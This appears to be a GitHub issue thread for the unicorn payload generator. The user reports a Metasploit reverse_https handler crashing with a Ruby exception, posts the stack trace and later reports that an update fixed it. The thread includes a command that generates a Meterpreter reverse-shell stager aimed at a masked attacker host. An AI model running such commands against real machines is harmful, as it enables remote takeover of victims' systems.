### ISSUE TITLE
exception handling request

### ISSUE THREAD

**Issue by johnjohnsp1** [trustedsec/unicorn#122]
hello,
did a try with the latest release unicorn (git cloned today 05/23/2019 at 02.26 PM)
used command line : python unicorn.py windows/meterpreter/reverse_https x.x.x.x 443
fired up msfconsole -r unicorn.rc

this the result:
[*] https://x.x.x.x:443 handling request from x.x.x.x; (UUID: t2vcfjwx) Staging x86 payload (180825 bytes) ...
[-] https://x.x.x.x:443 handling request from x.x.x.x; (UUID: t2vcfjwx) Exception handling request: Problem retrieving payload: undefined method `payloads' for #<Mdm::Workspace:0x00007f5a39b9ab50>. See log for more details.
[*] https://x.x.x.x:443 handling request from x.x.x.x; (UUID: t2vcfjwx) Staging x86 payload (180825 bytes) ...
[-] https://x.x.x.x:443 handling request from x.x.x.x; (UUID: t2vcfjwx) Exception handling request: Problem retrieving payload: undefined method `payloads' for #<Mdm::Workspace:0x00007f5a39b9ab50>. See log for more details.
[*] https://x.x.x.x:443 handling request from x.x.x.x; (UUID: t2vcfjwx) Staging x86 payload (180825 bytes) ...
[-] https://x.x.x.x:443 handling request from x.x.x.x; (UUID: t2vcfjwx) Exception handling request: Problem retrieving payload: undefined method `payloads' for #<Mdm::Workspace:0x00007f5a39b9ab50>. See log for more details.
...
..
...
.
..
[*] https://x.x.x.x:443 handling request from x.x.x.x; (UUID: t2vcfjwx) Staging x86 payload (180825 bytes) ...
[-] https://x.x.x.x:443 handling request from x.x.x.x; (UUID: t2vcfjwx) Exception handling request: Problem retrieving payload: undefined method `payloads' for #<Mdm::Workspace:0x00007f5a39b9ab50>. See log for more details.
....
...
and so on until i kill powershell.exe on victim.

Info tests:
attacker:kali linux
victim:windows10_1903
also tried with windows10_1803 and windows2016 but same results.

any ideas ?

**Comment by johnjohnsp1** [comment]
adding what's found inside the log:

[05/23/2019 08:28:07] [e(0)] core: Problem retrieving payload: undefined method `payloads' for #<Mdm::Workspace:0x00007f5a41a272e8>
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activemodel-4.2.11.1/lib/active_model/attribute_methods.rb:433:in `method_missing'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/msf/core/db_manager/payload.rb:23:in `block in payloads'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/connection_pool.rb:292:in `with_connection'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/msf/core/db_manager/payload.rb:17:in `payloads'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/payload_data_proxy.rb:7:in `block in payloads'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:166:in `data_service_operation'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/payload_data_proxy.rb:5:in `payloads'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/msf/core/handler.rb:234:in `create_session'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/msf/core/handler/reverse_http.rb:391:in `on_request'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/msf/core/handler/reverse_http.rb:234:in `block in setup_handler'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/rex/proto/http/handler/proc.rb:38:in `on_request'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/rex/proto/http/server.rb:368:in `dispatch_request'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/rex/proto/http/server.rb:302:in `on_client_data'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/rex/proto/http/server.rb:161:in `block in start'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:48:in `on_client_data'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:199:in `block in monitor_clients'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:197:in `each'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:197:in `monitor_clients'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:73:in `block in start'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
[05/23/2019 08:28:07] [e(0)] core: /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'
[05/23/2019 08:28:07] [e(0)] rex: Proc::on_request: RuntimeError: Problem retrieving payload: undefined method `payloads' for #<Mdm::Workspace:0x00007f5a41a272e8>. See log for more details.

/usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:174:in `log_error'
/usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/payload_data_proxy.rb:10:in `rescue in payloads'
/usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/payload_data_proxy.rb:3:in `payloads'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:234:in `create_session'
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_http.rb:391:in `on_request'
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_http.rb:234:in `block in setup_handler'
/usr/share/metasploit-framework/lib/rex/proto/http/handler/proc.rb:38:in `on_request'
/usr/share/metasploit-framework/lib/rex/proto/http/server.rb:368:in `dispatch_request'
/usr/share/metasploit-framework/lib/rex/proto/http/server.rb:302:in `on_client_data'
/usr/share/metasploit-framework/lib/rex/proto/http/server.rb:161:in `block in start'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:48:in `on_client_data'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:199:in `block in monitor_clients'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:197:in `each'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:197:in `monitor_clients'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream_server.rb:73:in `block in start'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'

i forgot to specify the attacker platform:
Linux FSTEMIB 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-1kali1 (2019-05-09) x86_64 GNU/Linux

thanks

**Comment by johnjohnsp1** [comment]
after apt update -> upgrade kali today metasploit has been fixed and now working.
thanks will close this ticket
